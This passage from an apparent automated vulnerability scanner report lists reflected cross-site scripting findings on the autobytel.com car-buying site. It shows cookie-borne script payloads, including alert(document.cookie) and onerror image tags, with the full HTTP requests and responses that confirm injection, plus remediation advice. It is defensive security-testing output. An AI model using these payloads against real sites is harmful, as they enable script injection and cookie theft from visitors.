Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4808f3"%3balert(1)//bcba1c35209; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:28:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:28:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39513


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4808f3";alert(1)//bcba1c35209";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "478BF05D-E586-7BA2-0D931DEA
...[SNIP]...

4.2029. http://www.autobytel.com/content/buy/warranty/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/warranty/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb53"%3balert(1)//e8c2790b457 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as acb53";alert(1)//e8c2790b457 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=acb53"%3balert(1)//e8c2790b457; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:39 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39513


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
"";
           //s.prop7 = "buy|";
           
           //s.prop9 = "buy|Search Engine Optimization Project|13148";
           s.prop10 = "buy|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "acb53";alert(1)//e8c2790b457||";
           
           s.prop14 = "buy|warranties : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "buy||||sky|ban|Search Engi
...[SNIP]...

4.2030. http://www.autobytel.com/content/buy/warranty/index.cfm [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/warranty/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload ea2f7<img%20src%3da%20onerror%3dalert(1)>0d22b5eeda3 was submitted in the PV_CT cookie. This input was echoed as ea2f7<img src=a onerror=alert(1)>0d22b5eeda3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2ea2f7<img%20src%3da%20onerror%3dalert(1)>0d22b5eeda3; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 47229
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:29:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:29:25 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:29:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:29:25 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2ea2f7<img src=a onerror=alert(1)>0d22b5eeda3 cannot be converted to a number.
</h1>
...[SNIP]...

4.2031. http://www.autobytel.com/content/home/help/index.cfm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d595"%3balert(1)//ef6e8a896d9 was submitted in the BDATALIST cookie. This input was echoed as 5d595";alert(1)//ef6e8a896d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c45d595"%3balert(1)//ef6e8a896d9; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45267


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c45d595";alert(1)//ef6e8a896d9";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47EFC719-04BB-A618-562C235A
...[SNIP]...

4.2032. http://www.autobytel.com/content/home/help/index.cfm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4235c"%3balert(1)//1b57b2c436c was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 4235c";alert(1)//1b57b2c436c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=4235c"%3balert(1)//1b57b2c436c; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45267


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";
           
           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "4235c";alert(1)//1b57b2c436c||";
           
           s.prop14 = "home|help : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search Engine O
...[SNIP]...

4.2033. http://www.autobytel.com/content/home/help/index.cfm [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 1daef<img%20src%3da%20onerror%3dalert(1)>3c8b2be1541 was submitted in the PV_CT cookie. This input was echoed as 1daef<img src=a onerror=alert(1)>3c8b2be1541 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=21daef<img%20src%3da%20onerror%3dalert(1)>3c8b2be1541; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 52986
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:39:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:39:34 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:39:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:39:34 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 21daef<img src=a onerror=alert(1)>3c8b2be1541 cannot be converted to a number.
</h1>
...[SNIP]...

4.2034. http://www.autobytel.com/content/home/help/index.cfm/action/about [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b56f"%3balert(1)//eaebc7de927 was submitted in the BDATALIST cookie. This input was echoed as 2b56f";alert(1)//eaebc7de927 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c42b56f"%3balert(1)//eaebc7de927; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:52 GMT
Content-Length: 32349
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:52 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c42b56f";alert(1)//eaebc7de927";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47E640E9-97ED-9F00-75F4064F
...[SNIP]...

4.2035. http://www.autobytel.com/content/home/help/index.cfm/action/about [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf1d7"%3balert(1)//20912d36e15 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as bf1d7";alert(1)//20912d36e15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=bf1d7"%3balert(1)//20912d36e15; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:41:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:53 GMT
Content-Length: 32349
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:41:52 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
;
           //s.prop7 = "help|";
           
           //s.prop9 = "help|Search Engine Optimization Project|13148";
           s.prop10 = "help|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "bf1d7";alert(1)//20912d36e15||";
           
           s.prop14 = "home|help|about : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "help||||sky|ban|Search En
...[SNIP]...

4.2036. http://www.autobytel.com/content/home/help/index.cfm/action/about [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 8a98a<img%20src%3da%20onerror%3dalert(1)>bc5962624b5 was submitted in the PV_CT cookie. This input was echoed as 8a98a<img src=a onerror=alert(1)>bc5962624b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=28a98a<img%20src%3da%20onerror%3dalert(1)>bc5962624b5; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 40069
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:38:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:29 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:28 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 28a98a<img src=a onerror=alert(1)>bc5962624b5 cannot be converted to a number.
</h1>
...[SNIP]...

4.2037. http://www.autobytel.com/content/home/help/index.cfm/action/contact [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e558"%3balert(1)//8c064b049ab was submitted in the BDATALIST cookie. This input was echoed as 7e558";alert(1)//8c064b049ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c47e558"%3balert(1)//8c064b049ab; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
